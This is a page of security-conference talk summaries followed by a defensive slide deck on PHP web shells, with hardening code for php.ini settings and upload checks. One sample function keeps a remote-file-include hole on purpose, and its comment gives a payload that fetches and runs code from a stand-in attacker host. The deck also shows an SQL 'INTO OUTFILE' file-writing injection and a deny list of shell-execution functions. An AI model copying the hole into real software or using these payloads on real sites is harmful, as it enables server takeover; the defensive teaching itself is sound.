TakeDownCon Rocket City: WebShells by Adrian Crenshaw (EC-Council)
The document discusses various techniques for gaining remote access to websites through automated collection of remote file inclusion (RFI) vulnerabilities and web shells. It provides examples of PHP code that can be used to upload files, execute system commands, and create backdoors. It also lists sources for common web shells and techniques for obfuscating shell code, communicating stealthily, and restricting access to authorized users only. The document is an educational overview of RFI exploitation and automated web shell collection and management.
Web-App Remote Code Execution Via Scripting Engines by Rahul Sasi at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
This document discusses finding vulnerabilities in SWF (Flash) files. It begins with an introduction to embedding SWF files in HTML and ActionScript versions. It then covers strategies for finding SWF files on websites, as well as types of issues like XSS, data hijacking, and information disclosure. The document provides details on tools for automated and manual testing of SWF files, such as decompiling files, identifying input parameters and sinks, and techniques for bypassing protections.
Abstract:
Secure code practices, system hardening, due diligence and due care principles are paramount in mitigating application level DoS attacks. These attacks often result in significant damage against unprepared and vulnerable organisations.
The intent of this talk is to help organisations strengthen their security posture against such attacks. The talk will explore the most common application level DoS attacks and will provide recommendations for protecting applications, detecting attacks and how to react under stressful conditions.
This document discusses methods for bypassing file upload restrictions on websites, including modifying HTTP headers, embedding malicious code in image files, and using NULL bytes in filenames. It demonstrates how these techniques can allow uploading PHP shells or other code to gain remote command execution or full server control. The document recommends upload logs and secure coding as better security practices than trying to implement perfect input filtering, which is complicated and can still be bypassed.
Veil-Pillage is a post-exploitation framework that provides flexible options for triggering actions on target machines in a stealthy manner. It integrates functionality from Veil-Catapult and includes new modules for tasks like credential validation, user hunting, and privilege escalation. Veil-Pillage utilizes various techniques like Pass-the-Hash and in-memory Mimikatz to dump hashes and credentials without dropping files. It features a modular structure and logging/cleanup functions to support automation and leave target systems unchanged.
BH Arsenal '14 TurboTalk: The Veil-framework (VeilFramework)
The Veil Framework is a toolset that bridges pentesting and red team capabilities. Its flagship tool, Veil-Evasion, generates antivirus-evading executables. Veil-Catapult provides initial payload delivery. Veil-PowerView enables situational awareness using PowerShell. Veil-Pillage is a post-exploitation framework that includes payload delivery, PowerSploit module execution, and hashdumping techniques. The tools aggregate techniques to evade detection and operate across domains using trusts.
This document discusses how malware authors try to detect analysis environments like sandboxes, virtual machines, and debuggers in order to avoid analysis. It presents real world malware examples that use these detection techniques. The document then proposes potential "vaccination" techniques to emulate unhealthy environments in order to trick malware into thinking it is not being analyzed, making the researcher's job easier. It showcases some proof-of-concept tools developed by the author for this purpose, including tools to fake the presence of virtual machines and debuggers. Challenges with vaccination techniques are also discussed.
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
When you don't have 0days: client-side exploitation for the masses (Michele Orru)
Conference: InsomniHack (21 March 2014)
Talk speakers:
Michele Orru (@antisnatchor)
Krzysztof Kotowicz (@kkotowicz)
Talk abstract:
A bag of fresh and juicy 0days is certainly something you would love to get as a Christmas present, but it would probably be just a dream you had one of those drunken nights.
Hold on! Not all is lost! There is still hope for pwning targets without 0days.
We will walk you through multiple real-life examples of client-side pwnage, from tricking the victim to take the bait, to achieving persistence on the compromised system.
The talk will be highly practical and will demonstrate how you can do proper client-side exploitation effectively, simply by abusing existing functionalities of browsers, extensions, legacy features, etc.
We'll delve into Chrome and Firefox extensions (automating various repetitive actions that you'll likely perform in your engagements), HTML applications, abusing User Interface expectations, (Open)Office macros and more. All the attacks are supposed to work on fully patched target software, with a bit of magic trickery as the secret ingredient.
You might already know some of these exploitation vectors, but you might need a way to automate your attacks and tailor them based on the victim language, browser, and whatnot. Either way, if you like offensive security, then this talk is for you.
The purpose of this presentation is to explain the basic resources needed to understand how a programmer can create malware, insights into the theme, and brainstorms following practical code and many exotic ideas for security mitigations for defense.
"If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle." ― Sun Tzu, The Art of War
This document provides an overview of the best tools for penetration testing web applications. It discusses Nikto for server enumeration and vulnerability scanning, Webscarab for intercepting requests and modifying parameters, w3af as an open source web application exploitation framework, and Firefox with extensions like Firebug and YSlow for manual testing. Commercial tools like Core Impact and Cenzic Hailstorm are also highlighted for their methodologies and capabilities. Additional resources like Samurai Linux are mentioned as a ready-to-go penetration testing environment with pre-installed web assessment tools.
In this presentation, you can learn many practical resources about WAF, how you can create your WAF, and how you can bypass protections in common WAFs.
This document provides techniques for escalating privileges on Windows systems. It begins with an overview of tricks that can grant escalated privileges to users or administrators. Specific techniques discussed include exploiting misconfigurations, using keyloggers, searching for credentials on systems, exploiting Group Policy Preferences files, unattended installation files, Windows Deployment Services, binary path modifications, service configuration issues, and registry permissions problems. The document then covers methods for escalating from an administrative user to SYSTEM level privileges like using Metasploit exploits, Sysinternals tools, binary replacement, and WMIC. It concludes with sections on achieving persistence and bypassing authentication.
A presentation covering some of the interesting things going on with PowerShell in the Infosec community. I give a brief overview of what PowerShell is, then go over some interesting aspects of three different offensive PowerShell frameworks and finally give a demo of how a local user can escalate to domain admin privileges using just these frameworks.
Major news in the month included unrest in Turkey and a coup in Thailand. Ebay was hacked and fake user databases were sold. The USA charged five Chinese nationals with cyber espionage. Memory issues caused failures in an air traffic control system. Interesting tools released included ones for bypassing two-factor authentication and exploiting ad networks. Heartbleed continued to be analyzed and disclosed vulnerabilities in certificate authorities.
The document discusses vulnerabilities in Flash applications. It begins by introducing Flash and explaining that while some claim it is outdated, it still poses security risks due to programming flaws. Several types of vulnerabilities are then outlined, including cross-site scripting, cross-domain policy misconfigurations, decompilation risks revealing sensitive data, and abuse of functions like getURL() that allow external code execution. Methods of exploiting these vulnerabilities are explained, along with mitigations like sanitizing inputs and using strict cross-domain policies. The document concludes by mentioning additional risks like camjacking through clickjacking.
Getting root with benign app store apps vsecurityfest (Csaba Fitzl)
This document discusses macOS privilege escalation techniques using benign App Store apps. It describes how dylib hijacking can be used to gain root privileges by subverting the installation process and dropping files in privileged locations. It provides a demonstration using a "Crontab Creator" app to drop a cronjob that executes a script with root privileges. The document also discusses monitoring tools and how Apple addressed the vulnerability in later versions of macOS.
Introducing PS>Attack: An offensive PowerShell toolkit (jaredhaight)
PS>Attack is designed to make it easy for Penetration Testers to incorporate PowerShell into their bag of tricks. It's a custom PowerShell console packed with some of the best offensive tools available. It's designed to be easy to use and opsec safe.
The Dirty Little Secrets They Didn't Teach You In Pentesting Class (Rob Fuller)
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
This document provides an overview of several security tools including Nikto, Burp Suite, Wikto, Nmap, Metasploit, Nessus, OpenVAS, and how some of them relate to and integrate with Nikto. It describes Nikto as a web server scanner that checks for vulnerabilities. It then briefly introduces each of the other tools, their purpose, and in some cases how they can work with Nikto, such as Nikto being able to use Nmap scan results or output results to Metasploit's database.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Bart Leppens gave a presentation on the Browser Exploitation Framework (BeEF). He discussed BeEF's architecture, how it hooks browsers, its module and extension system, and live demonstrations of information gathering, exploitation, and using BeEF with Metasploit. He also covered topics like inter-protocol communication, exploiting protocols like ActiveFax, and porting BeEF bind shellcode to Linux. The talk provided an overview of BeEF's capabilities and real-world attack scenarios.
Get-Help: An intro to PowerShell and how to Use it for Evil (jaredhaight)
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
Antonio Costa created the 0d1n tool, written in C for performance, to automate brute-forcing and fuzzing of web applications. The tool takes parameters like the target host, payload files, and custom request files to identify vulnerabilities like XSS. It can save responses and uses techniques like tampering to bypass defenses. The open source tool is still in beta but can find anomalies and vulnerabilities in parameters, files, directories and forms.
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core (NoSuchCon)
This document discusses kernel exploitation techniques. It begins by explaining the KernelIo technique for reading and writing kernel memory on Windows and Linux despite protections like SMAP and SMEP. It then discusses several vulnerability cases that can enable KernelIo like out of bounds writes, kmalloc overflows, and abusing KASLR. Next, it analyzes design flaws in kernels like linked lists, hidden pointers, and callback mechanisms. It evaluates the state of exploitation on modern systems and envisions future hardened operating system designs. It advocates moving to C++ for exploitation development rather than shellcoding and introduces a C++ exploitation framework. The document was presented by Peter Hlavaty of the Keen Team and encourages recruitment for vulnerability research.
Hacking Vulnerable Websites to Bypass Firewalls (Netsparker)
These slides were used by our security researcher Sven Morgenroth during the live demo of how to hack web applications and bypass firewalls. You can watch the live demo here: https://www.netsparker.com/blog/web-security/vulnerable-web-applications-developers-target/#livedemo
This document discusses various security issues that can arise in source control systems. It describes buffer overflow attacks, where a program writes data past the end of a memory buffer. It also discusses citizen/casual programmers who may not follow proper security practices. Covert channels that can transfer data in violation of security policies are described. The document outlines controls and best practices around these issues like parameter checking, memory protection, and auditing and logging.
PHP is the most commonly used server-side programming language, deployed on more than 80% of web servers all over the world. However, PHP is a 'grown' language rather than a deliberately engineered one, making writing insecure PHP applications far too easy and common. If you want to use PHP securely, then you should be aware of all its pitfalls.
The Supporting Role of Antivirus Evasion while Persisting (CTruncer)
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
Web Security: What's wrong, and how the bad guys can break your website (Andrew Sorensen)
1. The document summarizes a presentation on web security given to the Seattle PHP Users Group. It discusses common web vulnerabilities like SQL injection, cross-site scripting, and insecure direct object references.
2. It provides tips for protecting websites such as implementing a web application firewall, securing file permissions, and using HTML5 features like Content Security Policy headers.
3. The presentation emphasizes that security is an ongoing process of monitoring for updates, testing with hacking tools, and seeking outside reviews of a site's security.
This document summarizes vulnerabilities found in popular local web development environments like XAMPP, including cross-site scripting (XSS) and SQL injection vulnerabilities. It describes how an attacker could use these vulnerabilities to upload malicious JavaScript that steals browser history, obtains file system and network information, and creates a hidden web shell to execute commands on the victim's system. The document recommends keeping software updated, using a restrictive browser configuration like Noscript, and dividing content into security zones to help protect against these types of attacks.
This document summarizes vulnerabilities found in popular local web development environments like XAMPP, including cross-site scripting (XSS) and SQL injection vulnerabilities. It describes how XSS could be used to upload malicious JavaScript files that execute commands on the victim's system through PhpMyAdmin without authentication. The attack involves uploading a script via XSS that requests commands, gets a PhpMyAdmin token, and uses SQL queries to create and delete a web shell file to run arbitrary commands on the local file system and network.
This document summarizes vulnerabilities found in popular local web development environments like XAMPP, and how they can be exploited to perform cross-site scripting (XSS) and SQL injection attacks. It describes how an attacker could use XSS to upload a JavaScript file, add it to the page head, and then execute commands by communicating with a control server over JSONP. The script would then use the vulnerabilities in phpMyAdmin to create a web shell file and delete itself, allowing the attacker to hard-code commands to steal system information from the victim.
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi... (Hackito Ergo Sum)
Today most networks present one "gateway" to the whole network: the SSL-VPN. A vector that is often overlooked and considered "secure", we decided to take apart an industry-leading SSL-VPN appliance and analyze it to bits to thoroughly understand how secure it really is. During this talk we will examine the internals of the F5 FirePass SSL-VPN appliance. We discover that even though many security protections are in place, the internals of the appliance hide interesting vulnerabilities we can exploit. Through processes ranging from reverse engineering to binary planting, we decrypt the file system and begin examining the environment. As we go down the rabbit hole, our misconceptions about "security appliances" are revealed.
Using a combination of web vulnerabilities, format string vulnerabilities and a bunch of frustration, we manage to overcome the multiple limitations and protections presented by the appliance to gain a remote unauthenticated root shell. Due to the magnitude of this vulnerability and the potential for impact against dozens of Fortune 500 companies, we contacted F5 and received one of the best vendor responses we've experienced – EVER!
https://www.hackitoergosum.org
Ever Present Persistence - Established Footholds Seen in the Wild (CTruncer)
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
This document provides an introduction and glossary of key information technology terms. It defines what a glossary is and explains that computers are programmable through stored programs. It describes the main components of a computer's system unit including the processor, memory, and storage. It gives a high-level overview of how software is developed through a cycle of analysis, development and testing. It also discusses some common problems with software, different coding systems for mainframe and personal computers, popular programming and markup languages, and basics of domains, hosting, and transport protocols like HTTP and FTP.
Linux has become an integral part of embedded systems. This three-part presentation gives a deeper perspective on Linux from a system-programming point of view. Starting with the basics of Linux, it goes on to advanced aspects like thread and IPC programming.
Chapter 1: Introduction to Command Line (azzamhadeel89)
The document provides an introduction to using the command line interface. It discusses why the command line is useful, especially for security practitioners. It then describes the basic commands and operations used in the command line, including commands and arguments, navigating directories, listing files (with examples like ls, cd and mkdir), redirecting input/output, piping between commands, and running commands in the background. The document also discusses options for running Linux and the bash shell on Windows systems, such as using Git Bash, Cygwin, or the Windows Subsystem for Linux.
This document provides an overview of PHP (Hypertext Preprocessor), a widely-used open source scripting language especially suited for web development. It can be embedded into HTML and is executed on the server. PHP files contain text, HTML tags, and scripts enclosed in special PHP tags. An example PHP file is shown that outputs "Hello World". Reasons for using PHP include that it is open source, cross-platform, has free development tools, and supports many databases. PHP can be used for server-side scripting, command line scripting, and desktop applications. The installation procedure and basic PHP scripts, variables, operators, and functions are also outlined.
The document provides an overview of PHP and frameworks. It discusses open source software, widely used open source products like Linux, Apache, MySQL, and PHP. It covers the difference between open source and closed source software, pros and cons of open source, and background information on PHP including its history, variables, data types, conditional and looping statements, functions, arrays, and more. The document also discusses PHP frameworks, popular frameworks like WordPress, Magento and Opencart, and includes an index of topics covered.
Hacking Highly Secured Enterprise Environments by Zoltan Balazs (Shakacon)
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario where the hacker/penetration tester has deployed malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them is endless, e.g., communicating with a bind shell on a web server behind a restricted DMZ. Beware, live demo and fun included!
Red Hat Enterprise Linux provides strong security features that align with the defense in depth philosophy. These include hardening the operating system, applying security patches, using SELinux for mandatory access control, and implementing strong authentication methods. Proper authorization and profiling of users is also important to only grant necessary privileges.
3. What are PHP shell scripts?
● Scripts written (mostly) in PHP*;
● Placed on a server (mostly under existing PHP sites) without authorization from the server or web site owner;
● Used for "unauthorized maintenance" of the infected server;
● By "unauthorized maintenance" we mean literally anything.
4. "Unauthorized maintenance"
● Running applications/scripts (up to root privileges, once a local exploit has succeeded)
● "Piggybacking" on existing local exploits
● Modifying files
● Changing user passwords
● Enabling/disabling/reconfiguring system services
● Dumping, destroying and modifying databases
● Opening new backdoors to the system
5. Are there "the best" PHP shells?
● Surprisingly, yes: C99shell and all of its derivatives seem to be the most widespread PHP shells out there.
● There are literally thousands of PHP shell scripts out there; quality varies.
10. Documented possible pitfalls
● But most of the responsibility is on the programmer.
● The PHP team often does a good job of describing possible security pitfalls in its documentation.
11. Documented possible vulnerabilities
● attacks through the standard filesystem functions that also accept URLs (stream wrappers, i.e. socket operations) such as fopen(), include(), require()...*
● attacks through unvalidated upload forms (not documented clearly enough, obviously...)
● in the worst-case scenario, through a constellation of multiple bugs/vulnerabilities/weak setup, an attacker might even use SQL injection to write files on your server:
mysql> SELECT `injected_malicious_data`
FROM `yourtable`
INTO OUTFILE "file.php"
(This needs the FILE privilege on the database account, a target directory the MySQL server process may write to and, on current MySQL versions, one permitted by secure_file_priv; that is why "weak setup" is part of the constellation.)
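The first vector in the list, the include()/require() family accepting a URL, is easiest to see beside its fix. The following is an added example written for this page, not code from the slides; the page layout (fragments under PAGES_DIR selected by ?page=<name>) and the allowlist of page names are assumptions, and it targets PHP 8.

```php
<?php
// Added example (not from the slides): the include()/require() vector from the
// list above, in the vulnerable shape it usually has and in a hardened shape.
// Hypothetical layout: page fragments live in PAGES_DIR and are chosen by ?page=<name>.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// VULNERABLE: kept deliberately as the pattern under discussion.
// With allow_url_include=On, ?page=http://attacker.example/shell.txt%3F makes PHP
// fetch "http://attacker.example/shell.txt?.php" (the '?' turns our suffix into a
// query string) and execute whatever comes back. Even with remote includes off,
// ?page=../../uploads/avatar includes a local file the attacker managed to upload,
// suffix permitting.
function loadPageVulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: the user supplies a name, never a path. The name must be on an
// allowlist, and the resolved file must still lie inside PAGES_DIR.
function resolvePage(string $page, array $allowed = ['home', 'about', 'contact']): ?string
{
    if (!in_array($page, $allowed, true)) {
        return null;                                   // unknown page name
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;                                   // missing, or escaped the directory
    }
    return $path;
}

function loadPageSafe(string $page): void
{
    $path = resolvePage($page);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    include $path;
}

// Usage in a web context: loadPageSafe($_GET['page'] ?? 'home');
```

The allowlist alone closes the hole; the realpath() prefix check is there so that a later "improvement" that relaxes the allowlist still cannot reach outside PAGES_DIR.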
12. Other methods of infection
● Legend says there were infections with shell scripts through stolen FTP credentials. (Plain FTP also sends those credentials unencrypted, so "stolen" may simply mean "sniffed".)
So it's about time you changed your "god", "sex" and "love" stuff. Also, change those "password" and "password123". In other words, your server's security is only as strong as its weakest link.
● On shared hosting environments without proper user account isolation, it might not even be you who got infected but another shared-hosting client. Consult hosting support in order to track down how you were attacked.
14. And now the interesting part...
Let's take a peek at PHP shell code
15. General architecture
● Rather clever, if not smart, architecture
● Written mostly in PHP, but can carry any exploit code inside the PHP source in binary (compiled) form (mostly base64-encoded within variables), or even download the needed exploits (source or binary) from 3rd-party sites and compile and/or run them.
● If needed, can pull its own components from 3rd-party sites.
16. Quick development cycle
● Decentralized development
● Resulting in many variations of every PHP shell in the wild
● The code is often adapted to such a development process, usually guarding itself against redefinition of crucial components (an if (!function_exists(...)) check before every important definition, so that two merged variants do not fatally redeclare the same function)
● Can rely on 0-day exploits!
17. Quick development cycle
● The scary part: it's a really short way from a "plain PHP shell" to a full-blown bot script controlled through IRC
18. Coding style
● Not written by your know-just-a-little-coding regular PHP dev (no pun intended)
● You'll see what I mean...
19. Coding style
● Well documented code:
function mysql_query_parse($query, $output_type)
{
/*
if output_type == 0, no output,
if output_type == 1, no output if no error
if output_type == 2, output without control-buttons
if output_type == 3, output with control-buttons
*/
...
}
20. Coding style
● Proper understanding and usage of variable scopes:
function c99fsearch($d)
{
global $found;
global $found_d;
global $found_f;
global $search_i_f;
global $search_i_d;
global $a;
...
}
21. Coding style
● It's usually safer code than much of the production PHP code in the wild:
● If it's a cross-platform shell, it checks before calling a function that is unavailable on other platform(s)
● Variables included in HTML output are escaped, so there is no easy path to unwanted XSS
● SQL query parameters are also escaped, so there is no easy path to unwanted SQL injection
22. Coding style
● Variable/function name obfuscation is done in roughly half (50:50) of the PHP shells we collected
● External URLs, usernames and passwords are almost always encoded, using either base64 or some kind of ASCII-code-to-hex conversion
● Obviously not for real protection, but as obfuscation against the most obvious pattern searching during detection attempts*
24. GUI
● Mostly quite ugly, but always very efficient
● Sortable table output on every field
● You might be tempted to administer your server solely through PHP shell scripts. :-)
27. System preparation
These recommendations are best for hosters, but developers are also invited to keep them in mind!
● Whenever possible, chroot, or go even further with isolation of different web sites on the same machine (containers/pseudo-virtualization/virtualization), limiting potential damage to just one site.
● Regularly update your server's OS: PHP shells (as we've learned) can bring along local exploits.
● Seriously consider complex password policies if you're running a shared hosting environment.
28. Global PHP configuration
● Disable the potentially dangerous socket (URL) functionality of the filesystem PHP functions if you don't need it (allow_url_fopen, allow_url_include in php.ini); if you're not sure, you don't need it.
● When editing, keep in mind that some systems (*cough*Debian*cough*) have multiple php.ini files (one for mod_php, one for CLI, one for CGI, one for FPM, e.g. /etc/php/<version>/{apache2,cli,cgi,fpm}/php.ini). Take care of them all; php_ini_loaded_file() tells you which one a given SAPI actually read.
● Follow the usual security principles in server administration and maintenance.
29. Global PHP configuration
● Consider further crippling PHP by disabling at least the program-execution functions if you don't need them (through disable_functions).
● Which are those?
http://www.php.net/manual/en/ref.exec.php
● Leave something from the program-execution section enabled?*
escapeshellarg(), escapeshellcmd(): they only escape, they don't execute, and whatever code still legitimately runs commands should be using them.
● While on that subject: you can't disable eval() like this. :-) (It is a language construct, not a function, so disable_functions never sees it.)
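Because the setting has to reach the php.ini of every SAPI, it pays to verify from inside PHP rather than trusting the edit. The script below is an added example for this page, not code from the slides; the target settings in its header comment are the ones the two configuration slides recommend, and the extra functions popen() and pcntl_exec() are additions beyond the ref.exec.php list.

```php
<?php
// Added example (not from the slides): audit the settings the two configuration
// slides talk about, as seen by the SAPI that runs this script. Run it once with
// the CLI (php audit.php) and once through the web server: on systems with one
// php.ini per SAPI the two reports can differ, which is exactly the trap.
//
// Target state in php.ini (every copy of it):
//   allow_url_fopen = Off
//   allow_url_include = Off
//   disable_functions = exec,passthru,proc_open,shell_exec,system,popen,pcntl_exec
// escapeshellarg()/escapeshellcmd() are intentionally NOT in that list.
declare(strict_types=1);

// Functions that start programs: the ones from ref.exec.php, plus popen() (filesystem
// section) and pcntl_exec() (pcntl extension), which do the same thing elsewhere.
const EXEC_FUNCTIONS = ['exec', 'passthru', 'proc_open', 'shell_exec', 'system', 'popen', 'pcntl_exec'];

/** Settings still in the weak state under this SAPI; an empty array means all good. */
function configFindings(): array
{
    $findings = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $key) {
        if (filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = "$key is On";
        }
    }
    // function_exists() reports false for anything listed in disable_functions, so
    // this reflects what a shell script could actually call from here.
    foreach (EXEC_FUNCTIONS as $fn) {
        if (function_exists($fn)) {
            $findings[] = "$fn() is callable";
        }
    }
    if (!function_exists('escapeshellarg') || !function_exists('escapeshellcmd')) {
        $findings[] = 'escapeshellarg()/escapeshellcmd() disabled: legitimate code loses its escaping';
    }
    return $findings;
}

/** Which php.ini this SAPI actually read, so you know which file to fix. */
function configReport(): array
{
    return [
        'sapi'      => PHP_SAPI,
        'php_ini'   => php_ini_loaded_file() ?: '(none loaded)',
        'extra_ini' => php_ini_scanned_files() ?: '(none)',
        'findings'  => configFindings(),
    ];
}

// Stand-alone output; when served as a web page, view the source or wrap in <pre>.
print_r(configReport());
```

An empty "findings" list from the CLI and a non-empty one from the web server is the symptom of the multiple-php.ini problem described on the previous slide.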
30. Follow good coding practices
● Always be checking uploaded files! (It is incredible how much code does not do any kind of check.)
● Keep in mind not to rely on $_FILES[…]['type']. Why? Because it is copied straight from the client's request: the browser, or the attacker's script, chooses it.
32. Ok, how to check uploaded files?
● In general, checking the file extension could serve you well... as long as you don't stop there; use it as the primary defense measure.
● That might just not be enough sometimes. You might want to step up this game:
● check the MIME type on the server. On Linux, you can use the external file(1) utility, assuming you haven't disabled program-execution functions. (PHP's own fileinfo extension does the same content sniffing without spawning a process.)
● We'll see how others do it later.
33. Follow good coding practices
● Always be sanitizing and validating inputs. PHP shells can be injected through various vectors:
● Apply programming techniques to eliminate possible SQL injections (escaping, parametrization...)
● Always escape the shell commands you execute and their arguments.
● Always double-check the file names (and paths!) of the files you handle from the code!
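The upload checks from the "how to check uploaded files" slide and the file-name, path and shell-escaping points from this one fit into a single handler. What follows is an added example written for this page, not code from the slides or from any of the applications discussed later; it assumes PHP 8 with the fileinfo extension, a form field named "upload", and an UPLOAD_DIR that is outside the document root (or where PHP execution is switched off). The file(1) second opinion is the route the slides mention; fileinfo is used as the primary sniffer because it needs no execution function.

```php
<?php
// Added example (not from the slides): an upload handler that layers the checks
// the slides call for. Assumptions: PHP 8+, fileinfo loaded, form field "upload",
// UPLOAD_DIR outside the docroot or with PHP execution disabled.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/uploads';          // assumed location, adjust
const MAX_BYTES  = 2 * 1024 * 1024;

// Extension allowlist, mapped to the MIME type the *content* must sniff as.
const ALLOWED = [
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png',
    'gif' => 'image/gif', 'pdf' => 'application/pdf',
];

/** Primary measure: the last extension, lower-cased, must be on the allowlist.
 *  "shell.php.jpg" is judged as "jpg" and must then also sniff as a JPEG. */
function allowedExtension(string $clientName): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return array_key_exists($ext, ALLOWED) ? $ext : null;
}

/** Server-side sniffing of the bytes. $_FILES[...]['type'] is never consulted:
 *  it is copied from the request and the attacker fills it in. */
function sniffedMime(string $path): string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    return $mime === false ? 'application/octet-stream' : $mime;
}

/** Second opinion from file(1), the route the slides mention. Only possible when
 *  program-execution functions are not disabled; the argument is escaped. */
function fileUtilityMime(string $path): ?string
{
    if (!function_exists('shell_exec')) return null;
    $out = shell_exec('file --brief --mime-type ' . escapeshellarg($path) . ' 2>/dev/null');
    return is_string($out) ? trim($out) : null;
}

/** Validate one entry of $_FILES and store it under a server-chosen name.
 *  Returns the stored path; throws on anything suspicious. */
function storeUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) throw new RuntimeException('upload failed or missing');
    if ($file['size'] > MAX_BYTES) throw new RuntimeException('file too large');
    if (str_contains($file['name'], "\0")) throw new RuntimeException('NUL byte in file name'); // classic filter bypass
    $ext = allowedExtension($file['name']);
    if ($ext === null) throw new RuntimeException('extension not allowed');
    if (!is_uploaded_file($file['tmp_name'])) throw new RuntimeException('not an uploaded file'); // only what PHP received

    $mime = sniffedMime($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) throw new RuntimeException("content is $mime, not " . ALLOWED[$ext]);
    $second = fileUtilityMime($file['tmp_name']);
    if ($second !== null && $second !== $mime) throw new RuntimeException("fileinfo ($mime) and file(1) ($second) disagree");

    // Images: instantiate them, the way WordPress does, so a PHP payload behind a
    // forged image header is rejected rather than stored.
    if (str_starts_with($mime, 'image/') && @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }

    // The client's name (and any path inside it) is never reused: pick our own.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) throw new RuntimeException('could not move upload');
    chmod($target, 0640);                               // readable by the server, never executable
    return $target;
}

/** For later download/delete: map a user-supplied name back to a path and refuse
 *  anything that resolves outside UPLOAD_DIR ("../", absolute paths, symlinks). */
function confinedPath(string $userName): string
{
    if (str_contains($userName, "\0")) throw new RuntimeException('NUL byte in file name');
    $base = realpath(UPLOAD_DIR);
    $real = realpath(UPLOAD_DIR . '/' . basename($userName));
    if ($base === false || $real === false || !str_starts_with($real, $base . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException('path escapes the upload directory');
    }
    return $real;
}

// Usage in a request handler:
// try { $stored = storeUpload($_FILES['upload']); } catch (RuntimeException $e) { http_response_code(400); }
```

Each layer catches what the previous one lets through: the extension stops the obvious .php, the content sniff stops a .jpg that is really PHP, getimagesize() stops a PHP file wearing a forged image header, and the server-chosen name plus the realpath() check stop the file name itself from being the attack.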
35. WordPress
● As far as file uploads go, WordPress checks uploaded media types by instantiating them in the respective modules (e.g. it calls PHP's getimagesize() on images)
● WordPress is generally a very safe CMS. 3rd-party plugins are usually the source of security issues and PHP shell infections.
36. Roundcube webmail
● Puts no limitation itself on the uploaded content, since it is attached to e-mail messages and then deleted from temporary locations.
● Is it possible to attack remote e-mail clients like that? Depending on the destination client, it's possible. Not something the Roundcube devs should or could focus on.
37. Dokuwiki
● Guesses the MIME type by extension, and you limit the allowed MIME types for upload through configuration.
● You can enable upload of "dangerous file types" if you want.
38. Bonus slide
What happens when frustrated Sendmail administrators write PHP shells?
http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html